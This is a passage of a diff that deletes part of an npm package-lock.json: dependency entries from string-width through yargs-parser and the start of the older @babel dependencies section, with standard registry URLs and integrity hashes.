"^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/table": { - "version": "6.7.1", - "resolved": "https://registry.npmjs.org/table/-/table-6.7.1.tgz", - "integrity": "sha512-ZGum47Yi6KOOFDE8m223td53ath2enHcYLgOCjGr5ngu8bdIARQk6mN/wRMv4yMRcHnCSnHbCEha4sobQx5yWg==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^8.0.1", - "lodash.clonedeep": "^4.5.0", - "lodash.truncate": "^4.4.2", - "slice-ansi": "^4.0.0", - "string-width": "^4.2.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10.0.0" - } - }, - "node_modules/table/node_modules/ajv": { - "version": "8.6.2", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.6.2.tgz", - "integrity": "sha512-9807RlWAgT564wT+DjeyU5OFMPjmzxVobvDFmNAhY+5zD6A2ly3jDp6sgnfyDtlIQ+7H97oc/DGCzzfu9rjw9w==", - "dev": true, - "peer": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "json-schema-traverse": "^1.0.0", - "require-from-string": "^2.0.2", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/table/node_modules/json-schema-traverse": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", - "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", - "dev": true, - "peer": true - }, - "node_modules/tar": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.1.0.tgz", - "integrity": "sha512-ENhg4W6BmjYxl8GTaE7/h99f0aXiSWv4kikRZ9n2/JRxypZniE84ILZqimAhxxX7Zb8Px6pFdheW3EeHfhnXQQ==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.0", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=", - "dev": true, - "peer": true - }, - "node_modules/throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/tslib": { - "version": "2.6.2", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", - "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.0.13", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz", - "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-compile-cache": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.3.0.tgz", - "integrity": "sha512-l8lCEmLcLYZh4nbunNZvQCJc5pv7+RCwa8q/LdUx8u7lsWvPDKmpodJAJNwkAhJC//dFY48KuIEmjtd4RViDrA==", - "dev": true, - "peer": true - }, - "node_modules/v8-to-istanbul": { - "version": "9.2.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.2.0.tgz", - "integrity": "sha512-/EH/sDgxU2eGxajKdwLCDmQ4FWq+kpi3uCmBGpw1xJtnAxEjlD8j8PEiGWpCIMIs3ciNAgH0d3TTJiUkYzyZjA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/word-wrap": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.4.tgz", - "integrity": "sha512-2V81OA4ugVo5pRo46hAoD2ivUJx8jXmWXfUkY4KFNw0hEptvN0QfH3K4nHiwzGeKl5rFKedV48QVoqYavy4YpA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.12.11", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", - "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", - "dev": true, - "requires": { - "@babel/highlight": "^7.10.4" - } - }, - "@babel/compat-data": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.24.4.tgz", - "integrity": "sha512-vg8Gih2MLK+kOkHJp4gBEIkyaIi00jgWot2D9QOmmfLC8jINSOzmCLta6Bvz/JSBCqnegV0L80jhxkol5GWNfQ==", - "dev": true - }, - "@babel/core": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.24.4.tgz", - "integrity": "sha512-MBVlMXP+kkl5394RBLSxxk/iLTeVGuXTV3cIDXavPpMMqnSnt6apKgan/U8O3USWZCWZT/TbgfEpKa4uMgN4Dg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.24.2", - "@babel/generator": "^7.24.4", - "@babel/helper-compilation-targets": "^7.23.6", - "@babel/helper-module-transforms": "^7.23.3", - "@babel/helpers": "^7.24.4", - "@babel/parser": "^7.24.4", - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.24.4.tgz", - "integrity": "sha512-Xd6+v6SnjWVx/nus+y0l1sxMOTOMBkyL4+BIdbALyatQnAe/SRVjANeDPSCYaX+i1iJmuGSKf3Z+E+V/va1Hvw==", - "dev": true, - "requires": { - "@babel/types": "^7.24.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.23.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.23.6.tgz", - "integrity": "sha512-9JB548GZoQVmzrFgp8o7KxdgkTGm6xs9DW0o/Pim72UDjzr5ObUQ6ZzYPqA+g9OTS2bBQoctLJrky0RDCAWRgQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.23.5", - "@babel/helper-validator-option": "^7.23.5", - "browserslist": "^4.22.2", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.24.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.24.3.tgz", - "integrity": "sha512-viKb0F9f2s0BCS22QSF308z/+1YWKV/76mwt61NBzS5izMzDPwdq1pTrzf+Li3npBWX9KdQbkeCt1jSAM7lZqg==", - "dev": true, - "requires": { - "@babel/types": "^7.24.0" - } - }, - "@babel/helper-module-transforms": { - "version": "7.23.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.23.3.tgz", - "integrity": "sha512-7bBs4ED9OmswdfDzpz4MpWgSrV7FXlc3zIagvLFjS5H+Mk7Snr21vQ6QwrsoCGMfNC4e4LQPdoULEt4ykz0SRQ==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-module-imports": "^7.22.15", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.20" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.24.0.tgz", - "integrity": "sha512-9cUznXMG0+FxRuJfvL82QlTqIzhVW9sL0KjMPHhAOOvpQGL8QtdxnBKILjBqxlHyliz0yCa1G903ZXI/FuHy2w==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": 